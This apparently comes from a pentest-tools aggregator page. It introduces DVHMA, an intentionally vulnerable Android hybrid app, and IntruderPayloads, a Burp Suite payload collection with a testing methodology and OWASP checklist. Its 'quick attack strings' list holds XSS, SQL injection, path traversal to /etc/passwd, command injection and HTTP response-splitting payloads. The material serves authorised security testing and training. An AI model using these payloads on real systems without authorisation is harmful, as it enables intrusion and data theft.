DVHMA – Damn Vulnerable Hybrid Mobile App (For Android) That Intentionally Contains Vulnerabilities

Damn Vulnerable Hybrid Mobile App (DVHMA) is a hybrid mobile app (for Android) that intentionally contains vulnerabilities. Its purpose is to enable security professionals to test their tools and techniques legally, and to help developers better understand the common pitfalls in developing hybrid mobile apps securely.

Motivation and Scope

This app is developed to study pitfalls in developing hybrid apps securely, e.g., apps built with Apache Cordova or SAP Kapsel. Currently, the main focus is to develop a deeper understanding of injection vulnerabilities that exploit the JavaScript-to-Java bridge.

Installation

Prerequisites

We assume that the Android SDK (https://developer.android.com/sdk/index.html) and Apache Cordova (https://cordova.apache.org/), version 6.3.0 or later, are installed. Moreover, we assume a basic familiarity with the build system of Apache Cordova.

Building DVHMA

Setting Environment Variables

    export ANDROID_HOME=
    export PATH=$ANDROID_HOME/tools:$PATH
    export PATH=$ANDROID_HOME/platform-tools:$PATH

Compiling DVHMA

    cd DVHMA-Featherweight
    cordova plugin add ../plugins/DVHMA-Storage
    cordova plugin add ../plugins/DVHMA-WebIntent
    cordova platform add android
    cordova compile android

Running DVHMA in an Emulator

    cordova run android

Team Members

The development of this application started as part of the project ZertApps. ZertApps was a collaborative research project funded by the German Ministry for Research and Education. It is now developed and maintained by the Software Assurance & Security Research Team at The University of Sheffield, UK.

The core developers of DVHMA are:

- Achim D. Brucker
- Michael Herzberg

Publications

Achim D. Brucker and Michael Herzberg. On the Static Analysis of Hybrid Mobile Apps: A Report on the State of Apache Cordova Nation. In International Symposium on Engineering Secure Software and Systems (ESSoS). Lecture Notes in Computer Science (9639), pages 72-88, Springer-Verlag, 2016. https://www.brucker.ch/bibliography/abstract/brucker.ea-cordova-security-2016 doi: 10.1007/978-3-319-30806-7_5

Download DVHMA

Link: http://feedproxy.google.com/~r/PentestTools/~3/blm_ZImRphM/dvhma-damn-vulnerable-hybrid-mobile-app.html

IntruderPayloads – A Collection Of Burpsuite Intruder Payloads, Fuzz Lists And File Uploads

A collection of Burpsuite Intruder payloads, fuzz lists and pentesting methodology. To pull down all 3rd party repos, run install.sh in the same directory as the IntruderPayloads folder.

Author: 1N3@CrowdShield https://crowdshield.com

PENTEST METHODOLOGY v2.0

BASIC PASSIVE AND ACTIVE CHECKS:

- Burpsuite Spider with intelligent form submission
- Manual crawl of website through Burpsuite proxy and submitting INJECTX payloads for tracking
- Burpsuite passive scan
- Burpsuite engagement tools > Search > Find comments
- Burpsuite engagement tools > Find scripts
- Burpsuite engagement tools > Find references
- Burpsuite engagement tools > Analyze target
- Burpsuite engagement tools > Discover content
- Burpsuite Intruder > file/directory brute force
- Burpsuite Intruder > HTTP methods, user agents, etc.
- Enumerate all software technologies, HTTP methods, and potential attack vectors
- Understand the function of the site, what types of data are stored or valuable, what sorts of functions to attack, etc.

ENUMERATION:

- OPERATING SYSTEM
- WEB SERVER
- DATABASE SERVERS
- PROGRAMMING LANGUAGES
- PLUGINS/VERSIONS
- OPEN PORTS
- USERNAMES
- SERVICES
- WEB SPIDERING
- GOOGLE HACKING

VECTORS:

- INPUT FORMS
- GET/POST PARAMS
- URI/REST STRUCTURE
- COOKIES
- HEADERS

SEARCH STRINGS:

Just some helpful regex terms to search for passively using Burpsuite or any other web proxy...

    fname|phone|id|org_name|name|email

QUICK ATTACK STRINGS:

Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy...

    Company
    First Last
    username
    username@mailinator.com
    Password123$
    +1416312384
    google.com
    https://google.com
    //google.com
    .google.com
    https://google.com/.injectx/rfi_vuln.txt
    https://google.com/.injectx/rfi_vuln.txt?`whoami`
    https://google.com/.injectx/rfi_vuln.txt.png
    https://google.com/.injectx/rfi_vuln.txt.html
    12188
    01/01/1979
    4242424242424242
    INJECTX'>"></INJECTX>(1)
    javascript:alert(1)//
    "><img/onload=alert(1)>' --
    "></textarea><img/onload=alert(1)>' --
    INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
    '>"><iframe/onload=alert(1)></iframe>
    INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
    "></textarea><img/onload=alert(1)>' -- // INJECTX <!--
    "><img/onload=alert(1)>' -- // INJECTX <!--
    INJECTX'"><h1>X<!--
    INJECTX"><h1>X
    en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
    %0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
    ../../../../../../../../../../../etc/passwd
    sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
    admin" or "1"="1"--
    admin' or '1'='1'--
    first
    last
    company
    %0a%0d

OWASP TESTING CHECKLIST:

- Spiders, Robots and Crawlers IG-001
- Search Engine Discovery/Reconnaissance IG-002
- Identify application entry points IG-003
- Testing for Web Application Fingerprint IG-004
- Application Discovery IG-005
- Analysis of Error Codes IG-006
- SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) – SSL Weakness CM-001
- DB Listener Testing – DB Listener weak CM-002
- Infrastructure Configuration Management Testing – Infrastructure Configuration management weakness CM-003
- Application Configuration Management Testing – Application Configuration management weakness CM-004
- Testing for File Extensions Handling – File extensions handling CM-005
- Old, backup and unreferenced files – Old, backup and unreferenced files CM-006
- Infrastructure and Application Admin Interfaces – Access to Admin interfaces CM-007
- Testing for HTTP Methods and XST – HTTP Methods enabled, XST permitted, HTTP Verb CM-008
- Credentials transport over an encrypted channel – Credentials transport over an encrypted channel AT-001
- Testing for user enumeration – User enumeration AT-002
- Testing for Guessable (Dictionary) User Account – Guessable user account AT-003
- Brute Force Testing – Credentials Brute forcing AT-004
- Testing for bypassing authentication schema – Bypassing authentication schema AT-005
- Testing for vulnerable remember password and pwd reset – Vulnerable remember password, weak pwd reset AT-006
- Testing for Logout and Browser Cache Management – Logout function not properly implemented, browser cache weakness AT-007
- Testing for CAPTCHA – Weak Captcha implementation AT-008
- Testing Multiple Factors Authentication – Weak Multiple Factors Authentication AT-009
- Testing for Race Conditions – Race Conditions vulnerability AT-010
- Testing for Session Management Schema – Bypassing Session Management Schema, Weak Session Token SM-001
- Testing for Cookies attributes – Cookies are set not 'HTTP Only', 'Secure', and no time validity SM-002
- Testing for Session Fixation – Session Fixation SM-003
- Testing for Exposed Session Variables – Exposed sensitive session variables SM-004
- Testing for CSRF – CSRF SM-005
- Testing for Path Traversal – Path Traversal AZ-001
- Testing for bypassing authorization schema – Bypassing authorization schema AZ-002
- Testing for Privilege Escalation – Privilege Escalation AZ-003
- Testing for Business Logic – Bypassable business logic BL-001
- Testing for Reflected Cross Site Scripting – Reflected XSS DV-001
- Testing for Stored Cross Site Scripting – Stored XSS DV-002
- Testing for DOM based Cross Site Scripting – DOM XSS DV-003
- Testing for Cross Site Flashing – Cross Site Flashing DV-004
- SQL Injection – SQL Injection DV-005
- LDAP Injection – LDAP Injection DV-006
- ORM Injection – ORM Injection DV-007
- XML Injection – XML Injection DV-008
- SSI Injection – SSI Injection DV-009
- XPath Injection – XPath Injection DV-010
- IMAP/SMTP Injection – IMAP/SMTP Injection DV-011
- Code Injection – Code Injection DV-012
- OS Commanding – OS Commanding DV-013
- Buffer overflow – Buffer overflow DV-014
- Incubated vulnerability – Incubated vulnerability DV-015
- Testing for HTTP Splitting/Smuggling – HTTP Splitting, Smuggling DV-016
- Testing for SQL Wildcard Attacks – SQL Wildcard vulnerability DS-001
- Locking Customer Accounts – Locking Customer Accounts DS-002
- Testing for DoS Buffer Overflows – Buffer Overflows DS-003
- User Specified Object Allocation – User Specified Object Allocation DS-004
- User Input as a Loop Counter – User Input as a Loop Counter DS-005
- Writing User Provided Data to Disk – Writing User Provided Data to Disk DS-006
- Failure to Release Resources – Failure to Release Resources DS-007
- Storing too Much Data in Session – Storing too Much Data in Session DS-008
- WS Information Gathering – N.A. WS-001
- Testing WSDL – WSDL Weakness WS-002
- XML Structural Testing – Weak XML Structure WS-003
- XML content-level Testing – XML content-level WS-004
- HTTP GET parameters/REST Testing – WS HTTP GET parameters/REST WS-005
- Naughty SOAP attachments – WS Naughty SOAP attachments WS-006
- Replay Testing – WS Replay Testing WS-007
- AJAX Vulnerabilities – N.A. AJ-001
- AJAX Testing – AJAX weakness AJ-002

LOW SEVERITY:

A list of low severity findings that are likely out of scope for most bug bounty programs but still helpful to reference for normal web penetration tests.

- Descriptive error messages (e.g. Stack Traces, application or server errors).
- HTTP 404 codes/pages or other HTTP non-200 codes/pages.
- Banner disclosure on common/public services.
- Disclosure of known public files or directories (e.g. robots.txt).
- Click-Jacking and issues only exploitable through click-jacking.
- CSRF on forms which are available to anonymous users (e.g. the contact form).
- Logout Cross-Site Request Forgery (logout CSRF).
- Presence of application or web browser 'autocomplete' or 'save password' functionality.
- Lack of Secure and HTTPOnly cookie flags.
- Lack of Security Speedbump when leaving the site.
- Weak Captcha / Captcha Bypass
- Username enumeration via Login Page error message
- Username enumeration via Forgot Password error message
- Login or Forgot Password page brute force and account lockout not enforced.
- OPTIONS / TRACE HTTP method enabled
- SSL Attacks such as BEAST, BREACH, Renegotiation attack
- SSL Forward secrecy not enabled
- SSL Insecure cipher suites
- The Anti-MIME-Sniffing header X-Content-Type-Options
- Missing HTTP security headers
- Security best practices without accompanying Proof-of-Concept exploitation
- Descriptive error messages (e.g. Stack Traces, application or server errors).
- HTTP 404 codes/pages or other HTTP non-200 codes/pages.
- Denial of Service Attacks.
- Fingerprinting / banner disclosure on common/public services.
- Disclosure of known public files or directories (e.g. robots.txt).
- Clickjacking and issues only exploitable through clickjacking.
- CSRF on non-sensitive forms.
- Logout Cross-Site Request Forgery (logout CSRF).
- Presence of application or web browser 'autocomplete' or 'save password' functionality.
- Lack of Secure/HTTPOnly flags on non-sensitive Cookies.
- Lack of Security Speedbump when leaving the site.
- Weak Captcha / Captcha Bypass
- Login or Forgot Password page brute force and account lockout not enforced.
- OPTIONS HTTP method enabled
- HTTPS Mixed Content Scripts
- Known vulnerable libraries
- Attacks on Third Party Ad Services
- Username / email enumeration via Forgot Password or Login page
- Missing HTTP security headers
  - Strict-Transport-Security Not Enabled For HTTPS
  - X-Frame-Options
  - X-XSS-Protection
  - X-Content-Type-Options
  - Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
  - Content-Security-Policy-Report-Only
- SSL Issues, e.g.
  - SSL Attacks such as BEAST, BREACH, Renegotiation attack
  - SSL Forward secrecy not enabled
  - SSL weak / insecure cipher suites
- Lack of SPF records (Email Spoofing)
- Auto-complete enabled on password fields
- HTTP enabled
- Session ID or Login Sent Over HTTP
- Insecure Cookies
- Cross-Domain.xml Allows All Domains
- HTML5 Allowed Domains
- Cross Origin Policy
- Content Sniffing Not Disabled
- Password Reset Account Enumeration
- HTML Form Abuse (Denial of Service)
- Weak HSTS Age (86,000 or less)
- Lack of Password Security Policy (Brute Forcable Passwords)
- Physical Testing
- Denial of service attacks
- Resource Exhaustion attacks
- Issues related to rate limiting
- Login or Forgot Password page brute force and account lockout not enforced
- api*.netflix.com listens on port 80
- Cross-domain access policy scoped to *.netflix.com
- Username / Email Enumeration
  - via Login Page error message
  - via Forgot Password error message
  - via Registration
- Weak password
- Weak Captcha / Captcha bypass
- Lack of Secure/HTTPOnly flags on cookies
- Cookie valid after logout
- Cookie valid after password reset
- Cookie expiration
- Forgot password autologin
- Autologin token reuse
- Same Site Scripting
- SSL Issues, e.g.
  - SSL Attacks such as BEAST, BREACH, Renegotiation attack
  - SSL Forward secrecy not enabled
  - SSL weak / insecure cipher suites
  - SSL vulnerabilities related to configuration or version
- Descriptive error messages (e.g. Stack Traces, application or server errors).
- HTTP 404 codes/pages or other HTTP non-200 codes/pages.
- Fingerprinting/banner disclosure on common/public services.
- Disclosure of known public files or directories (e.g. robots.txt).
- Clickjacking and issues only exploitable through clickjacking.
- CSRF on forms that are available to anonymous users (e.g. the contact form).
- Logout Cross-Site Request Forgery (logout CSRF).
- Missing CSRF protection on non-sensitive functionality
- Presence of application or web browser 'autocomplete' or 'save password' functionality.
- Incorrect Charset
- HTML Autocomplete
- OPTIONS HTTP method enabled
- TRACE HTTP method enabled
- Missing HTTP security headers, specifically (https://www.owasp.org/index.php/List_of_useful_HTTP_headers), e.g.
  - Strict-Transport-Security
  - X-Frame-Options
  - X-XSS-Protection
  - X-Content-Type-Options
  - Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
  - Content-Security-Policy-Report-Only
- Issues only present in old browsers/old plugins/end-of-life software browsers
  - IE < 9
  - Chrome < 40
  - Firefox < 35
  - Safari < 7
  - Opera < 13
- Vulnerability reports related to the reported version numbers of web servers, services, or frameworks

Download IntruderPayloads
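The low-severity list above repeatedly names missing HTTP security headers and a weak HSTS max-age as findings. As an added example (not code from the IntruderPayloads project), the script below parses a raw HTTP response head and reports those two checklist items; the header set, the threshold of 86,000 seconds and the sample response are constructed here for the demonstration.

```python
from typing import Dict, List

# Headers the low-severity list calls out; any of these absent is a finding.
EXPECTED_HEADERS = [
    "strict-transport-security",
    "x-frame-options",
    "x-content-type-options",
    "content-security-policy",
]
# The list treats an HSTS max-age of 86,000 seconds or less as weak.
WEAK_HSTS_MAX_AGE = 86000


def parse_headers(raw_response: str) -> Dict[str, str]:
    """Map lower-cased header names to values from a raw HTTP response head."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def hsts_max_age(value: str) -> int:
    """Return the max-age directive of an HSTS header value (0 if unparseable)."""
    for directive in value.split(";"):
        key, _, num = directive.strip().partition("=")
        if key.strip().lower() == "max-age" and num.strip().isdigit():
            return int(num.strip())
    return 0


def audit(raw_response: str) -> List[str]:
    """Return checklist findings (missing headers, weak HSTS age) for one response."""
    headers = parse_headers(raw_response)
    findings = [f"missing header: {h}" for h in EXPECTED_HEADERS if h not in headers]
    hsts = headers.get("strict-transport-security")
    if hsts is not None and hsts_max_age(hsts) <= WEAK_HSTS_MAX_AGE:
        findings.append(f"weak HSTS max-age: {hsts_max_age(hsts)}")
    return findings


# Constructed sample response (not captured from any real host).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Strict-Transport-Security: max-age=3600\r\n"
    "X-Frame-Options: DENY\r\n"
    "\r\n<html>ok</html>"
)
```

Running `audit(SAMPLE_RESPONSE)` reports the two absent headers and the one-hour HSTS lifetime; a response carrying all four headers with a long max-age yields an empty list.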

Link: http://feedproxy.google.com/~r/PentestTools/~3/dwr4rfW5XYM/intruderpayloads-collection-of.html